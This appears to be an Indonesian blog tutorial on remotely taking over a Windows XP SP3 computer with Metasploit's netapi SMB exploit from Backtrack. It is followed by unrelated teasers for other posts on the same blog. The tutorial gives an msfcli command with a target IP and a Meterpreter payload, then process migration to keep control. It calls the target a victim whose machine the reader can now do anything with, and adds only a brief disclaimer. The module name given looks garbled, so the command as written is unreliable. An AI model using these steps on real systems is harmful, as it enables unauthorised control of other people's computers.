Skip to main content

Exploit Windows XP with Exploit Netapi

hello!!!


sekarang saya mau kasih tutorial bagaimana untuk Exploit Windows XP SP3 dengan Backtrack 5 R3. untuk melakukan exploit, kita akan menggunakan tools penetration testing yang sudah terinstall default di Backtrack 5 R3 yaitu Metasploit Framework(MSF). dalam kerjanya MSF menggunakan module exploit yang sudah tersimpan dalam toolsnya. MSF mempunyai module Exploit yang sangat banyak, dalam kali saya akan menggunakan salah satu modulenya yaitu "windows/smb/ms09_067_netapi" yang sudah terkenal.  :a

tanpa banyak kata lagi. langsung saja ke langkah-langkahnya. :

1. buka terminal.
2. ketik msfcli windows/smb/ms09_067_netapi RHOST=192.168.88.93 PAYLOAD=windows/meterpreter/bind_tcp E
( saya asumsikan Kalian sudah mengetahui IP VIctim nya)
3. tunggu beberapa detik, jika berhasil akan muncul "meterpreter>".
(syarat untuk exploit berhasil adalah firewall dalam victim harus terbuka/nonaktif).
4. setelah masuk meterpreter. kalian terserah mau ngapain. karna komputer korban sudah kalian kendalikan. ^..^
5. untuk lebih leluasa kalian harus mendapatkan user privelage target. dengan cara "migrate" kedalam salah satu process yang ada.
6. caranya ketik "ps".
7. ketik "migrate 644 " angka 644 bisa anda ganti dengan angka yang terdapat pada PID salah satu processnya.
dalam tutorial ini saya sengaja tidak memberikan shortcut karna saya sudah menyiapakan video untuk pembelajaran anda dibawah ini :


Video Tutorial Exploit Netapi

sekian tutorial saya. apabila ada yang tidak jelas bisa kalian tanyakan lewat kolom komentar.

DB : TUTORIAL INI DIPERUNTUKAN HANYA UNTUK PENGETAHUAN SEMATA. SEGALA TINDAKAN DARI USER YANG MENGGUNAKAN TUTORIAL INI. TIDAK DALAM TANGGUNG JAWAB PENULIS(SAYA).

semoga bermanfaat dan sampai jumpa....  :b   :c :d :f :g
:h :i

Popular posts from this blog

Automatic API Documentation Swagger in Golang #GolangDev

pixabay.com In this article, I'll explain how to generate an API blueprint instantly using SwagGo in Golang. API blueprint is a document that contains a bunch of API endpoints, its slickly same as documentation but less description, it's allow another programmer to read and see all the available endpoint and try it out with sandbox feature. Swagger is one of the most used API blueprints right now, it's available in free but limited usage. if you wanna use the free credit, you need to understand YAML notation, you can read the example notation in swagger official documentation. but again, it's really hard and takes an expensive time to arranges all the notation to achieve a good API blueprint. fortunately, there are tools in Golang that allow us to generate the YAML notation and automatically generate the blueprint page with only using markup notation, and it's FREE unlimited for self-host, insane right? SwagGo tools are available here , the documentation is very cl...

Mengapa .env File Laravel Tidak Terupload / Tercommit ke Git

.env file atau bisa kita bilang "environment file" atau file yang berisi variable constan untuk memberikan value secara global ke dalam aplikasi kita. file ini berisi variable dan value yang sensitif yang membuatnya sangat riskan atau beresiko apabila di ketahui oleh orang yang tidak bertanggung jawab. contoh  seperti berikut ini file .env di atas memiliki informasi sensitif seperti host, user dan password dari database kita. maka dari itu kita sebagai developer harus pintar-pintar untuk memperlakukan .env file ini, secara default apabila kita upload ke hosting atau vps file .env ini tidak akan bisa di akses secara global dari host kita, karna letak root host kita ada di folder public yang notabene berada di satu level ke atas folder dari posisi .env. jadi user awam tidak akan bisa mengakses dari host kita eg : http://angon.dev/.env . nah kalo ke git gmn? apabila kita menggunakan version controller seperti github, gitlab, bitbucket. secara default git akan mem...

OpenVPN Alternatif Solusi Menanggulangi Blokir dari KOMINFO

Sejak akhir juli 2022 kemaren indonesia di gegerkan dengan tindakan kominfo atas diblokirnya banyak platform digital karna tidak mendaftar PSE, terutama paypal dan plaform game (steam, epic game dll). keputusan ini semakin membuat netizen geram dikarenakan platform judi online malah disetujui untuk beroperasi karna sudah daftar PSE. Jujur menurut saya memang keputusan ini sejak awal saya dengar sudah mengada-ada karna sangat aneh memblokir semua platform digital yang jumlahnya tidak terhitung banyaknya dan hanya membolehkan akses platform yang sudah mendaftar yang jumlahnya hanya ratusan.  saya sebagai developer juga merasa aneh banget ini kebijakan apalagi platform development juga banyak yang di blacklist oleh kominfo seperti, github, gitlab, bitbucket, even website CDN pun di blacklist. astaga wkwkwk. anyway terlepas dari kebijakan konyol ini, saya mau berbagi tips cara agar tetep bisa mengakses semua platform tersebut tanpa ada halangan, yaitu dengan menggunakan VPN. banyak ban...